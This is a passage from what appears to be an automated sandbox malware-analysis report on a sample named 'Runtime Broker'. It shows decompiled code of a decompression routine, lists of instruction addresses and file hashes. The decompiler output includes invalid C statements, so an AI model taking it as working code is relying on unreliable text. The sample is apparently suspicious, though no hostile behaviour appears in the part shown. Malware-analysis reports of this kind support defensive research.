								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406fa7
0x00406fa7
0x00406fab
0x00407062
0x00407065
0x00407071
0x00406f52
0x00406f52
0x00406f55
0x004072c7
0x004072c7
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x00407316
0x0040733d
0x0040733d
0x00407343
0x00407343
0x00000000
0x00407318
0x00407318
0x0040731c
0x004074cb
0x00000000
0x004074cb
0x00407328
0x0040732f
0x00407337
0x0040733a
0x00000000
0x0040733a
0x00406fb1
0x00406fb5
0x004074f6
0x004074f6
0x004074f9
0x004074fd
0x004074fd
0x00406fbb
0x00406fc1
0x00406fc4
0x00406fc8
0x00406fcb
0x00406fcf
0x00407495
0x004074e1
0x004074e9
0x004074f0
0x004074f2
0x00000000
0x004074f2
0x00406fd5
0x00406fd8
0x00406fde
0x00406fe0
0x00406fe0
0x00406fe3
0x00406fe6
0x00406fe9
0x00406fec
0x00406fef
0x00406ff2
0x00406ff3
0x00406ff5
0x00406ff5
0x00406ff5
0x00406ff8
0x00406ffb
0x00406ffe
0x00407001
0x00407001
0x00407004
0x00407006
0x00407006
0x00407009
0x00407009
0x00407009
0x00406adf
0x00406adf
0x00406ae8
0x00000000
0x00000000
0x00406aee
0x00000000
0x00406af9
0x00000000
0x00000000
0x00406b02
0x00406b05
0x00406b08
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b58
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x00000000
0x0040744a
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00000000
0x00407459
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c5b
0x00406c5d
0x00406c60
0x00406cd1
0x00406cd4
0x00406cd7
0x00406cde
0x00406ce8
0x00000000
0x00406ce8
0x00406c62
0x00406c66
0x00406c69
0x00406c6b
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c83
0x00406c87
0x00406c8e
0x00406c91
0x00406c98
0x00406c9c
0x00406ca4
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406ca8
0x00406cab
0x00406cc9
0x00406ccb
0x00000000
0x00406cad
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00000000
0x00406cc4
0x00000000
0x00406efa
0x00406efe
0x00406f1c
0x00406f1f
0x00406f26
0x00406f29
0x00406f2c
0x00406f2f
0x00406f32
0x00406f35
0x00406f37
0x00406f3e
0x00406f3f
0x00406f41
0x00406f44
0x00406f47
0x00406f4a
0x00406f4a
0x00406f4f
0x00000000
0x00406f4f
0x00406f00
0x00406f03
0x00406f06
0x00406f10
0x00000000
0x00000000
0x00406f64
0x00406f68
0x00406f8b
0x00406f8e
0x00406f91
0x00406f9b
0x00406f6a
0x00406f6a
0x00406f6d
0x00406f70
0x00406f73
0x00406f80
0x00406f83
0x00406f83
0x00000000
0x00000000
0x00000000
0x00000000
0x00407018
0x0040701c
0x00407023
0x00407026
0x00407029
0x00407033
0x00000000
0x00407033
0x0040701e
0x00000000
0x00000000
0x0040703f
0x00407043
0x0040704a
0x0040704d
0x00407050
0x00407045
0x00407045
0x00407045
0x00407053
0x00407056
0x00407059
0x00407059
0x0040705c
0x0040705f
0x00000000
0x00000000
0x004070ff
0x004070ff
0x00407103
0x004074a1
0x00000000
0x004074a1
0x00407109
0x0040710c
0x0040710f
0x00407113
0x00407116
0x0040711c
0x0040711e
0x0040711e
0x0040711e
0x00407121
0x00407124
0x00000000
0x00000000
0x00406cf4
0x00406cf4
0x00406cf8
0x00407465
0x00000000
0x00407465
0x00406cfe
0x00406d01
0x00406d04
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d19
0x00406d1c
0x00406d1f
0x00000000
0x00000000
0x00406d25
0x00406d2b
0x00000000
0x00000000
0x00406d31
0x00406d31
0x00406d35
0x00406d38
0x00406d3b
0x00406d3e
0x00406d41
0x00406d42
0x00406d45
0x00406d47
0x00406d4d
0x00406d50
0x00406d53
0x00406d56
0x00406d59
0x00406d5c
0x00406d5f
0x00406d7b
0x00406d7e
0x00406d81
0x00406d84
0x00406d8b
0x00406d8f
0x00406d91
0x00406d95
0x00406d61
0x00406d61
0x00406d65
0x00406d6d
0x00406d72
0x00406d74
0x00406d76
0x00406d76
0x00406d98
0x00406d9f
0x00406da2
0x00000000
0x00406da8
0x00000000
0x00406da8
0x00000000
0x00406dad
0x00406dad
0x00406db1
0x00407471
0x00000000
0x00407471
0x00406db7
0x00406dba
0x00406dbd
0x00406dc1
0x00406dc4
0x00406dca
0x00406dcc
0x00406dcc
0x00406dcc
0x00406dcf
0x00406dd2
0x00406dd2
0x00406dd2
0x00406dd8
0x00000000
0x00000000
0x00406dda
0x00406ddd
0x00406de0
0x00406de3
0x00406de6
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df5
0x00406df8
0x00406e10
0x00406e13
0x00406e16
0x00406e19
0x00406e19
0x00406e1c
0x00406e20
0x00406e22
0x00406dfa
0x00406dfa
0x00406e02
0x00406e07
0x00406e09
0x00406e0b
0x00406e0b
0x00406e25
0x00406e2c
0x00406e2f
0x00000000
0x00406e31
0x00000000
0x00406e31
0x00406e2f
0x00406e36
0x00406e36
0x00406e36
0x00406e36
0x00000000
0x00000000
0x00406e71
0x00406e71
0x00406e75
0x0040747d
0x00000000
0x0040747d
0x00406e7b
0x00406e7e
0x00406e81
0x00406e85
0x00406e88
0x00406e8e
0x00406e90
0x00406e90
0x00406e90
0x00406e93
0x00406e96
0x00406e96
0x00406e9c
0x00406e3a
0x00406e3a
0x00406e3d
0x00000000
0x00406e3d
0x00406e9e
0x00406e9e
0x00406ea1
0x00406ea4
0x00406ea7
0x00406eaa
0x00406ead
0x00406eb0
0x00406eb3
0x00406eb6
0x00406eb9
0x00406ebc
0x00406ed4
0x00406ed7
0x00406eda
0x00406edd
0x00406edd
0x00406ee0
0x00406ee4
0x00406ee6
0x00406ebe
0x00406ebe
0x00406ec6
0x00406ecb
0x00406ecd
0x00406ecf
0x00406ecf
0x00406ee9
0x00406ef0
0x00406ef3
0x00000000
0x00406ef5
0x00000000
0x00406ef5
0x00000000
0x00407182
0x00407182
0x00407186
0x004074ad
0x00000000
0x004074ad
0x0040718c
0x0040718f
0x00407192
0x00407196
0x00407199
0x0040719f
0x004071a1
0x004071a1
0x004071a1
0x004071a4
0x00000000
0x00000000
0x00000000
0x00000000
0x00407291
0x00407295
0x004072b7
0x004072ba
0x004072c4
0x00000000
0x004072c4
0x00407297
0x0040729a
0x0040729e
0x004072a1
0x004072a1
0x004072a4
0x00000000
0x00000000
0x0040734e
0x00407352
0x00407370
0x00407370
0x00407370
0x00407377
0x0040737e
0x00407385
0x00407385
0x00000000
0x00407385
0x00407354
0x00407357
0x0040735a
0x0040735d
0x00407364
0x004072a8
0x004072a8
0x004072ab
0x00000000
0x00000000
0x0040743f
0x00407442
0x00000000
0x00000000
0x00407079
0x0040707b
0x00407082
0x00407083
0x00407085
0x00407088
0x00000000
0x00000000
0x00407090
0x00407093
0x00407096
0x00407098
0x0040709a
0x0040709a
0x0040709b
0x0040709e
0x004070a5
0x004070a8
0x004070b6
0x00000000
0x00000000
0x0040738c
0x0040738c
0x0040738f
0x00407396
0x00000000
0x00000000
0x0040739b
0x0040739b
0x0040739f
0x004074d7
0x00000000
0x004074d7
0x004073a5
0x004073a8
0x004073ab
0x004073af
0x004073b2
0x004073b8
0x004073ba
0x004073ba
0x004073ba
0x004073bd
0x004073c0
0x004073c0
0x004073c0
0x004073c0
0x004073c3
0x004073c3
0x004073c7
0x00407427
0x0040742a
0x0040742f
0x00407430
0x00407432
0x00407434
0x00407437
0x00000000
0x00407437
0x004073c9
0x004073cf
0x004073d2
0x004073d5
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e4
0x004073e7
0x004073ea
0x00407403
0x00407406
0x00407409
0x0040740c
0x00407410
0x00407412
0x00407412
0x00407413
0x00407416
0x004073ec
0x004073ec
0x004073f4
0x004073f9
0x004073fb
0x004073fe
0x004073fe
0x00407419
0x00407420
0x00000000
0x00407422
0x00000000
0x00407422
0x00000000
0x004070be
0x004070c1
0x004070f7
0x00407227
0x00407227
0x00407227
0x00407227
0x0040722a
0x0040722a
0x0040722d
0x0040722f
0x004074b9
0x00000000
0x004074b9
0x00407235
0x00407238
0x00000000
0x00000000
0x0040723e
0x00407242
0x00407245
0x00407245
0x00407245
0x00000000
0x00407245
0x004070c3
0x004070c5
0x004070c7
0x004070c9
0x004070cc
0x004070cd
0x004070cf
0x004070d1
0x004070d4
0x004070d7
0x004070ed
0x004070f2
0x0040712a
0x0040712a
0x0040712e
0x0040715a
0x0040715c
0x00407163
0x00407166
0x00407169
0x00407169
0x0040716e
0x0040716e
0x00407170
0x00407173
0x0040717a
0x0040717d
0x004071aa
0x004071aa
0x004071ad
0x004071b0
0x00407224
0x00407224
0x00407224
0x00000000
0x00407224
0x004071b2
0x004071b8
0x004071bb
0x004071be
0x004071c1
0x004071c4
0x004071c7
0x004071ca
0x004071cd
0x004071d0
0x004071d3
0x004071ec
0x004071ee
0x004071f1
0x004071f2
0x004071f5
0x004071f7
0x004071fa
0x004071fc
0x004071fe
0x00407201
0x00407203
0x00407206
0x0040720a
0x0040720c
0x0040720c
0x0040720d
0x00407210
0x00407213
0x004071d5
0x004071d5
0x004071dd
0x004071e2
0x004071e4
0x004071e7
0x004071e7
0x00407216
0x0040721d
0x004071a7
0x004071a7
0x004071a7
0x004071a7
0x00000000
0x0040721f
0x00000000
0x0040721f
0x0040721d
0x00407130
0x00407133
0x00407135
0x00407138
0x0040713b
0x0040713e
0x00407140
0x00407143
0x00407146
0x00407146
0x00407149
0x00407149
0x0040714c
0x00407153
0x00407127
0x00407127
0x00407127
0x00407127
0x00000000
0x00407155
0x00000000
0x00407155
0x00407153
0x004070d9
0x004070dc
0x004070de
0x004070e1
0x00000000
0x00000000
0x00406e40
0x00406e40
0x00406e44
0x00407489
0x00000000
0x00407489
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5e
0x00406e61
0x00406e64
0x00406e67
0x00406e69
0x00406e69
0x00406e69
0x00000000
0x00000000
0x00000000
0x00000000
0x00407248
0x00407248
0x00407248
0x0040724c
0x00000000
0x00000000
0x00407252
0x00407255
0x00407258
0x0040725b
0x0040725d
0x0040725d
0x0040725d
0x00407260
0x00407263
0x00407266
0x00407269
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407272
0x00407272
0x00407275
0x00407278
0x0040727b
0x0040727e
0x00407281
0x00407285
0x00407287
0x0040728a
0x00000000
0x0040728c
0x00000000
0x0040728c
0x0040728a
0x004074bf
0x00000000
0x00000000
0x00406aee

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406EFA, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406EFA() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
